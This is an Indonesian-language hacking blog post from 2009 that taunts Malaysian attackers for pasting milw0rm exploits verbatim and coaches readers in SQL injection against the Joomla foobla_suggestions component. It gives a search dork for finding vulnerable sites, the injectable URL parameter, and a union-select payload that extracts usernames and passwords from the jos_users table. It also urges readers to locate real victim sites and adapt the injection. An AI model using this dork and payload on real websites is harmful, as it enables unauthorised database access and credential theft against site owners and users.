Di blognya YaDoY666, Saya melihat cerita YaDoY666 melawan orgil dari Malingsial yang menyerang Wordpress dengan Joomla Exploit Jadoel...
Dan saya juga melihat bahwa Maling juga nyerang dengan copas exploit milw0rm langsung (sama-sama dengan union+select+...... padahal itu cuma exploit buat beberapa situs yang nama columnnya sama, jumlah columnnya sama, dll.)
Nah, untuk Malingsial, saya buat postingan ini supaya kalian lebih creative dan lebih pinter (maunya disuap sama gue...)
Nih Caranya:
Misalnya kita dapet Exploit ini:
POC Exploit:
http://127.0.0.1/[path]/index.php?option=com_foobla_suggestions&controller=comment&idea_id=[Sqlinjection]
Nah, yg diatas itu, bisa dijadiin dork, tapi kalo mau dork yang lebih bagus, pake inurl:com_foobla_suggestion (diatas itu letak bugsnya)
Jangan copas exploit yang ini langsung ke web yang dituju: (Ini Exploitnya, kelanjutan dari atas kalo kita lanjutin SQLi)
/index.php?option=com_foobla_suggestions&controller=comment&idea_id=null+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos
_users
Yang diatas CUMA DEMO, kamu harusnya mulai dari: http://127.0.0.1/[path]/index.php?option=com_foobla_suggestions&controller=comment&idea_id=
Misalnya kita dapet korban:
http://127.0.0.1/index.php?option=com_foobla_suggestions&controller=comment&idea_id=20
Lalu kita kan lagi SQLi, kita tambahin Single Quotes kan?
Begitulah Seterusnnya... (SQLi)
OK, selamat milw0rm-ing
JADI KALO MAU COPAS JANGAN EXPLOITNYA, TAPI LETAK BUGSNYA (tapi disesuaikan juga sih sama component-nya)
Misalnya kita sudah tau kalo situs www.aaa.com punya component foobla suggestion, nah, berarti kita masukin di address bar:http://www.aaa.com/index.php?option=com_foobla_suggestions&controller=comment&idea_id=1 dan lakukan SQLi...
---END---
Minggu, 20 September 2009
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar
Silahkan kasih komentar kepada saya, walaupun bagus, jelek, saya akan menerimanya, dan mengoreksinya... Kan gak ada yang sempurna kan? :D